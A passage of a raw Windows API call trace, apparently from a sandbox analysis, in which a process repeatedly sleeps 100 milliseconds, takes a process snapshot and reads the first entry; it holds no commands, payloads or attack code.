1 [0278.866] Sleep (dwMilliseconds=0x64) [0278.888] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0278.926] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.078] Sleep (dwMilliseconds=0x64) [0279.137] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0279.154] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.336] Sleep (dwMilliseconds=0x64) [0279.375] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0279.449] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.947] Sleep (dwMilliseconds=0x64) [0280.044] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0280.081] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.895] Sleep (dwMilliseconds=0x64) [0280.952] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0281.058] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.255] Sleep (dwMilliseconds=0x64) [0281.265] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0281.278] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.448] Sleep (dwMilliseconds=0x64) [0281.456] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0281.474] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.546] Sleep (dwMilliseconds=0x64) [0281.549] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0281.565] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.639] Sleep (dwMilliseconds=0x64) [0281.642] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0281.662] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.984] Sleep (dwMilliseconds=0x64) [0282.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0282.072] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.169] Sleep (dwMilliseconds=0x64) [0282.174] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0282.366] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.442] Sleep (dwMilliseconds=0x64) [0282.443] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0282.454] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.533] Sleep (dwMilliseconds=0x64) [0282.535] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0282.545] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.614] Sleep (dwMilliseconds=0x64) [0282.616] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0282.672] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.781] Sleep (dwMilliseconds=0x64) [0282.783] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0282.795] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.933] Sleep (dwMilliseconds=0x64) [0282.935] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0282.946] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.038] Sleep (dwMilliseconds=0x64) [0283.039] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0283.055] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.135] Sleep (dwMilliseconds=0x64) [0283.137] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0283.299] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.114] Sleep (dwMilliseconds=0x64) [0284.231] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0284.246] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.648] Sleep (dwMilliseconds=0x64) [0284.652] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0284.664] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.736] Sleep (dwMilliseconds=0x64) [0284.737] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0284.750] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.823] Sleep (dwMilliseconds=0x64) [0284.871] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0284.883] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.954] Sleep (dwMilliseconds=0x64) [0284.956] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0284.967] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.047] Sleep (dwMilliseconds=0x64) [0285.050] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0285.109] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.313] Sleep (dwMilliseconds=0x64) [0285.338] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0285.349] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.438] Sleep (dwMilliseconds=0x64) [0285.440] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0285.451] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.531] Sleep (dwMilliseconds=0x64) [0285.536] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0285.548] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.626] Sleep (dwMilliseconds=0x64) [0285.628] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0285.639] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.707] Sleep (dwMilliseconds=0x64) [0285.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0285.719] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.795] Sleep (dwMilliseconds=0x64) [0285.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0285.811] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.917] Sleep (dwMilliseconds=0x64) [0285.919] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0285.932] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.002] Sleep (dwMilliseconds=0x64) [0286.004] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0286.015] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.097] Sleep (dwMilliseconds=0x64) [0286.098] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0286.111] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.197] Sleep (dwMilliseconds=0x64) [0286.199] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0286.213] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.286] Sleep (dwMilliseconds=0x64) [0286.288] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0286.299] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.376] Sleep (dwMilliseconds=0x64) [0286.378] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0286.389] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.468] Sleep (dwMilliseconds=0x64) [0286.471] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0286.482] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.550] Sleep (dwMilliseconds=0x64) [0286.552] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0286.563] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.630] Sleep (dwMilliseconds=0x64) [0286.632] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0286.643] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.719] Sleep (dwMilliseconds=0x64) [0286.720] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0286.731] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.800] Sleep (dwMilliseconds=0x64) [0286.801] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0286.815] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.915] Sleep (dwMilliseconds=0x64) [0286.916] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0286.926] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.063] Sleep (dwMilliseconds=0x64) [0287.065] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0287.076] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.152] Sleep (dwMilliseconds=0x64) [0287.153] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0287.174] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.246] Sleep (dwMilliseconds=0x64) [0287.256] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0287.268] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.340] Sleep (dwMilliseconds=0x64) [0287.342] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0287.356] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.436] Sleep (dwMilliseconds=0x64) [0287.440] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0287.452] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.523] Sleep (dwMilliseconds=0x64) [0287.524] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0287.536] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.607] Sleep (dwMilliseconds=0x64) [0287.609] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0287.620] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.690] Sleep (dwMilliseconds=0x64) [0287.696] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0287.708] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.777] Sleep (dwMilliseconds=0x64) [0287.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0287.789] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.881] Sleep (dwMilliseconds=0x64) [0287.883] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0287.900] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.976] Sleep (dwMilliseconds=0x64) [0287.977] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0287.988] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.057] Sleep (dwMilliseconds=0x64) [0288.059] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0288.069] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.242] Sleep (dwMilliseconds=0x64) [0288.244] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0288.255] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.327] Sleep (dwMilliseconds=0x64) [0288.331] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0288.342] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.410] Sleep (dwMilliseconds=0x64) [0288.412] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0288.422] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.494] Sleep (dwMilliseconds=0x64) [0288.495] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0288.506] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.580] Sleep (dwMilliseconds=0x64) [0288.582] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0288.595] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.664] Sleep (dwMilliseconds=0x64) [0288.666] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 